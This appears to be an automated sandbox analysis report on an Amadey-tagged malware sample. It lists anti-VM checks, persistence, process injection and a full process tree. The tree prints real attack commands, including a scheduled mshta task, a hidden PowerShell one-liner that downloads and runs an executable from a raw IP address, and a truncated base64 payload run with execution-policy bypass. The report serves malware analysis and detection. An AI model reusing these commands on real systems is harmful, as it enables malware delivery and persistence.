amadey | 968347c6a38e85cd7db48dbc60d7e49bd1181050a1984029d62a2f92dbb9ae35

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fe8615daed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d374d248b2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	84023c6440.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4588	powershell.exe
93	4464	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2428	powershell.exe
4588	powershell.exe
4464	powershell.exe

Downloads MZ/PE file 9 IoCs

flow	pid	Process
102	1532	rapes.exe
32	1532	rapes.exe
45	1532	rapes.exe
45	1532	rapes.exe
45	1532	rapes.exe
45	1532	rapes.exe
45	1532	rapes.exe
45	1532	rapes.exe
9	4588	powershell.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	84023c6440.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fe8615daed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fe8615daed.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d374d248b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	84023c6440.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d374d248b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2f97072e.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2f97072e.cmd	powershell.exe

Executes dropped EXE 17 IoCs

pid	Process
5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
1532	rapes.exe
5600	84023c6440.exe
4156	8ccc92f4b9.exe
4632	rapes.exe
3676	fe8615daed.exe
3044	svchost015.exe
4668	d374d248b2.exe
2696	svchost015.exe
2772	19b9006121.exe
5744	rapes.exe
4764	kO2IdCz.exe
1480	Rm3cVPI.exe
5772	TbV75ZR.exe
1400	7IIl2eE.exe
5288	Passwords.com
4608	u75a1_003.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	d374d248b2.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	84023c6440.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	fe8615daed.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	kO2IdCz.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
1848	tasklist.exe
3192	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
1532	rapes.exe
5600	84023c6440.exe
4632	rapes.exe
3676	fe8615daed.exe
4668	d374d248b2.exe
5744	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3676 set thread context of 3044	3676	fe8615daed.exe	123
PID 4668 set thread context of 2696	4668	d374d248b2.exe	126
PID 2772 set thread context of 5212	2772	19b9006121.exe	129
PID 5772 set thread context of 3968	5772	TbV75ZR.exe	155

Drops file in Windows directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\rapes.job	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3212	3968	WerFault.exe	155

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d374d248b2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	84023c6440.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ccc92f4b9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fe8615daed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings	rapes.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2464	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4464	powershell.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
4588	powershell.exe
4588	powershell.exe
5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
1532	rapes.exe
1532	rapes.exe
5600	84023c6440.exe
5600	84023c6440.exe
5600	84023c6440.exe
5600	84023c6440.exe
5600	84023c6440.exe
5600	84023c6440.exe
4632	rapes.exe
4632	rapes.exe
3676	fe8615daed.exe
3676	fe8615daed.exe
4668	d374d248b2.exe
4668	d374d248b2.exe
5744	rapes.exe
5744	rapes.exe
5212	MSBuild.exe
5212	MSBuild.exe
5212	MSBuild.exe
5212	MSBuild.exe
4464	powershell.exe
4464	powershell.exe
2428	powershell.exe
2428	powershell.exe
3968	MSBuild.exe
3968	MSBuild.exe
3968	MSBuild.exe
3968	MSBuild.exe
4232	fontdrvhost.exe
4232	fontdrvhost.exe
4232	fontdrvhost.exe
4232	fontdrvhost.exe
1480	Rm3cVPI.exe
1480	Rm3cVPI.exe
1480	Rm3cVPI.exe
1480	Rm3cVPI.exe
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	4464	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	1848	tasklist.exe
Token: SeDebugPrivilege	3192	tasklist.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5288	Passwords.com
5288	Passwords.com
5288	Passwords.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5548 wrote to memory of 6068	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5548 wrote to memory of 6068	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5548 wrote to memory of 6068	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 5548 wrote to memory of 3660	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 5548 wrote to memory of 3660	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 5548 wrote to memory of 3660	5548	2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 6068 wrote to memory of 2464	6068	cmd.exe	89
PID 6068 wrote to memory of 2464	6068	cmd.exe	89
PID 6068 wrote to memory of 2464	6068	cmd.exe	89
PID 3660 wrote to memory of 4588	3660	mshta.exe	91
PID 3660 wrote to memory of 4588	3660	mshta.exe	91
PID 3660 wrote to memory of 4588	3660	mshta.exe	91
PID 4588 wrote to memory of 5580	4588	powershell.exe	97
PID 4588 wrote to memory of 5580	4588	powershell.exe	97
PID 4588 wrote to memory of 5580	4588	powershell.exe	97
PID 5580 wrote to memory of 1532	5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE	98
PID 5580 wrote to memory of 1532	5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE	98
PID 5580 wrote to memory of 1532	5580	TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE	98
PID 1532 wrote to memory of 5600	1532	rapes.exe	112
PID 1532 wrote to memory of 5600	1532	rapes.exe	112
PID 1532 wrote to memory of 5600	1532	rapes.exe	112
PID 1532 wrote to memory of 4156	1532	rapes.exe	116
PID 1532 wrote to memory of 4156	1532	rapes.exe	116
PID 1532 wrote to memory of 4156	1532	rapes.exe	116
PID 1532 wrote to memory of 3676	1532	rapes.exe	121
PID 1532 wrote to memory of 3676	1532	rapes.exe	121
PID 1532 wrote to memory of 3676	1532	rapes.exe	121
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 3676 wrote to memory of 3044	3676	fe8615daed.exe	123
PID 1532 wrote to memory of 4668	1532	rapes.exe	124
PID 1532 wrote to memory of 4668	1532	rapes.exe	124
PID 1532 wrote to memory of 4668	1532	rapes.exe	124
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 4668 wrote to memory of 2696	4668	d374d248b2.exe	126
PID 1532 wrote to memory of 2772	1532	rapes.exe	127
PID 1532 wrote to memory of 2772	1532	rapes.exe	127
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 2772 wrote to memory of 5212	2772	19b9006121.exe	129
PID 1532 wrote to memory of 4764	1532	rapes.exe	134
PID 1532 wrote to memory of 4764	1532	rapes.exe	134
PID 4764 wrote to memory of 2456	4764	kO2IdCz.exe	135
PID 4764 wrote to memory of 2456	4764	kO2IdCz.exe	135
PID 2244 wrote to memory of 4412	2244	cmd.exe	139

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2656
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4232

C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-30_fd21a7eb1fb3c59be7cac38ecaa11213_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 7eLOBmaNIKL /tr "mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6068
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 7eLOBmaNIKL /tr "mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2464
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\7M5R0VMu8.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4588
  - - C:\Users\Admin\AppData\Local\TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE
      "C:\Users\Admin\AppData\Local\TempORTEQMBN37I7DQQ3NJCQZYVSFQMOKOJQ.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5580
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\10382080101\84023c6440.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382080101\84023c6440.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5600
      - C:\Users\Admin\AppData\Local\Temp\10382090101\8ccc92f4b9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382090101\8ccc92f4b9.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4156
      - C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382100101\fe8615daed.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3044
      - C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382110101\d374d248b2.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2696
      - C:\Users\Admin\AppData\Local\Temp\10382120101\19b9006121.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382120101\19b9006121.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5212
      - C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382130101\kO2IdCz.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4764
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c 67e8f4de3ad1d.vbs
        7⤵
        
        PID:2456
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3580
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382141121\5YB5L4K.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3IC